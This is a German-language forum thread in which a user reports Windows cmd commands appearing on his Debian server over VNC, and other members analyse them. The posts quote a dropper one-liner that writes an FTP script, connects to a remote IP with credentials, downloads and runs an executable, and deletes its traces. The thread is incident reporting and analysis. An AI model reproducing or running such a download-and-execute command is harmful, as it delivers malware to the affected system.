Virus? wtf...

Hardware, Software, Webdesign & Coding.

Moderator: Katana

Post Reply
User avatar
Arkard
Posts: 1944
Joined: Sun Apr 08, 2001 12:01 am
Location: Vorarlberg
Contact:

Virus? wtf...

Post by Arkard »

Hab heute meinen Linux Server neu aufgesetzt (Debian Testing). Und als ich so im Terminal (kein putty, über VNC viewer) n bissi Software installiert hab (nix besonderes, nur apache, php, ftp, wine, etc.) hat sich plötzlich mein Terminal verselbstständigt.

Im Terminal sind ohne, dass ich etwas getippt hab Befehle aufgetaucht. Hier die Befehle:

Code: Select all

%systemroot%ßsystem32ßcmd.exe
cmd /c echo open 85.181.199.114 10090 >> ik &echo user james 12198841 >> ik &echo get 7.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &7.exe &exit
Habs erst ganz witzig gefunden, dass der n paar win Befehle ausführen will und dachte dass liegt vielleicht an meinem Windows Rechner. Also hab ich mal meinen PC gescannt und den VNC viewer geschlossen. Derweil bin ich zocken gegangen und nach einer Weile hör ich plötzlich den Server beepen. Ich geh also zum Windows Rechner, starte den viewer und schon wieder ist ein Terminal Fenster offen. Hab gleich mal die History angeschaut und siehe da:

Code: Select all

%systemroot%ßsystem32ßcmd.exe
cmd /c echo open 0.0.0.0 25969 >> ik &echo user zXvS zXvS >> ik &echo get 9.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &9.exe &exit
Der Inhalt der ik Datei liest sich folgendermaßen:

Code: Select all

user zXvS zXvS
get 9.exe
bye
Was, bitteschön, ist da los? Windows Virus der unter wine läuft, oder doch ein Virus der von einem meiner Windows PCs aufmuckt?

Hab auch gleich mal probiert auf den FTP zu verbinden (James//12198841), nach der Authentifizierung bricht aber die Verbindung ab.
User avatar
retroK
Co-Admin
Posts: 5592
Joined: Tue Nov 30, 1999 1:01 am
Location: Frankfurt a.M.
Contact:

Post by retroK »

Das sieht alles sehr mysteriös aus!
Hast du mittlerweile was rausgefunden?
Image
retrozone member #9

_________________
Ich weiss warum da Stroh liegt!
User avatar
Katana
Posts: 5337
Joined: Sun Jan 02, 2000 1:01 am
Location: Nördliches NRW, Deutschland
Contact:

Post by Katana »

In der Tat.

Unter Win würde er die cmd.exe öffnen (funktioniert also nicht unter Win9x :)), dann folgendes in die Datei "ik" schreiben:

Code: Select all

open 0.0.0.0 25969
user zXvS zXvS
get 9.exe
bye
dann würde er das ftp Kommando aufrufen und die in die Datei ik geschrieben Befehle ausführen.
Dann die Datei "ik" wieder löschen, die 9.exe ausführen und die cmd.exe wieder schließen.

Beim ersten Versuch verbindet er sich als "user james 12198841" mit dem Server 85.181.199.114:10090.

Frage mich, wohin er mit 0.0.0.0 will.

Denke mal, dass du die Software aus den Debian-Quellen installiert hast, per APT. Daher sollte also nichts komisches kommen. Wundere mich allerdings stark, was ein Windows Wurm/Virus (wobei mir das irgendwie nach "Scriptkiddie Adware" aussieht) auf 'ner Linux Kiste macht.
User avatar
Arkard
Posts: 1944
Joined: Sun Apr 08, 2001 12:01 am
Location: Vorarlberg
Contact:

Post by Arkard »

Als ich heute wieder mal nach dem Server gesehen hab war wieder was da^^. 2 Dateibrowser von wine und das Fenster zum Torrents öffnen von µTorrent. Als Dateiname stand im µTorrent Fenster wieder die cmd.exe.
User avatar
DarkZero
Posts: 2342
Joined: Sun Jul 15, 2001 12:01 am
Location: Eigentlich Fulda, aber jetzt Berlin
Contact:

Post by DarkZero »

Katana wrote:Wundere mich allerdings stark, was ein Windows Wurm/Virus (wobei mir das irgendwie nach "Scriptkiddie
Adware" aussieht) auf 'ner Linux Kiste macht.
Naja, es gibt Viren, die laufen unter WINE. Mit WINE kann man sogar MS vormachen, man hätte ein legales Windows. Ist kein Scherz, hat bei mir schon funktioniert.
満足したら終でしょう!
Homepage: DarkZero's Translations
Image Renault Fahrer
Post Reply